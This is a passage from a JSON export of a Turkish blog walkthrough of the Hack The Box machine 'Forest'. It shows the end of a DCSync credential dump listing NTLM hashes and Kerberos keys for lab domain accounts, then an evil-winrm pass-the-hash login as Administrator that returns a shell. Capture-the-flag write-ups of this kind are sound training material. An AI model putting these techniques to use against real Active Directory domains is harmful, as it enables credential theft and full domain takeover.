435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::\nkuday:7601:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::\nburnable:7602:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\nFOREST$:1000:aad3b435b51404eeaad3b435b51404ee:1142db94deb8eb1d22f13a01bb427b5e:::\nEXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::\n[*] Kerberos keys grabbed\nkrbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b\nkrbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58\nkrbtgt:des-cbc-md5:9dd5647a31518ca8\nhtb.local\\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4\nhtb.local\\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e\nhtb.local\\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e\nhtb.local\\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf\nhtb.local\\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd\nhtb.local\\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e\nhtb.local\\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e\nhtb.local\\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed\nhtb.local\\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983\nhtb.local\\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91\nhtb.local\\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f\nhtb.local\\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a\nhtb.local\\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c\nhtb.local\\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8\nhtb.local\\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d\nhtb.local\\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81\nhtb.local\\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6\nhtb.local\\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5\nhtb.local\\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a\nhtb.local\\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2\nhtb.local\\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29\nhtb.local\\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7\nhtb.local\\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538\nhtb.local\\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702\nhtb.local\\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352\nhtb.local\\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d\nhtb.local\\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701\nhtb.local\\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd\nhtb.local\\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36\nhtb.local\\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb\nhtb.local\\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c\nhtb.local\\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3\nhtb.local\\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054\nhtb.local\\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161\nhtb.local\\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a\nhtb.local\\sebastien:des-cbc-md5:702a3445e0d65b58\nhtb.local\\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5\nhtb.local\\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad\nhtb.local\\lucinda:des-cbc-md5:a13bb56bd043a2ce\nhtb.local\\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32\nhtb.local\\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea\nhtb.local\\svc-alfresco:des-cbc-md5:014ac86d0b98294a\nhtb.local\\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f\nhtb.local\\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6\nhtb.local\\andy:des-cbc-md5:a2ab5eef017fb9da\nhtb.local\\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6\nhtb.local\\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81\nhtb.local\\mark:des-cbc-md5:b5dff1f40b8f3be9\nhtb.local\\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427\nhtb.local\\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25\nhtb.local\\santi:des-cbc-md5:4075ad528ab9e5fd\nkuday:aes256-cts-hmac-sha1-96:1a133259ccb94ee299f2659d809784e288674805cdb328fd72406676b151a377\nkuday:aes128-cts-hmac-sha1-96:f3e2594c135534a828ef14cf94f39af4\nkuday:des-cbc-md5:a15b1397837cef26\nburnable:aes256-cts-hmac-sha1-96:a12b97bcc2c40baef0221cdc74995dff2fad7d982fd488380a6b485677b6a685\nburnable:aes128-cts-hmac-sha1-96:b9ed5d275010ff79c303c9802c61f319\nburnable:des-cbc-md5:a85d52d99b32efc4\nFOREST$:aes256-cts-hmac-sha1-96:ea6ccc7d1267e9296927132a2b177f5f9b2f5db7dcbefd89dc24c9c49009b8e9\nFOREST$:aes128-cts-hmac-sha1-96:cec3668c8994a865f19929d99d0d11a3\nFOREST$:des-cbc-md5:8f8638e69dd3b370\nEXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6\nEXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e\nEXCH01$:des-cbc-md5:8c45f44c16975129\n[*] Cleaning up... \n<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# evil-winrm --hash 32693b11e6aa90eb43d32c72a07ceea6 --ip 10.10.10.161 -P 5985 --user Administrator                                                                                                                                    1 \u2a2f\n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> whoami\nhtb\\administrator<\/code><\/pre>\n
Not: PowerView.ps1 dosyas\u0131n\u0131n githubtaki son dosya olmas\u0131na \u00f6zen g\u00f6sterin.<\/p>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo Forest – HTB Kolay Windows Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. [*] Scan: 53 Starting Nmap 7.91 ( https:\/\/nmap.org ) at…<\/p>\n
Devam\u0131n\u0131 okuForest<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,498],"tags":[419,439,456,438],"class_list":["post-1390","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-walkthrough","tag-as-rep","tag-as-rep-roasting","tag-asreproast","tag-dcsync","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1390"}],"version-history":[{"count":4,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1390\/revisions"}],"predecessor-version":[{"id":1871,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1390\/revisions\/1871"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}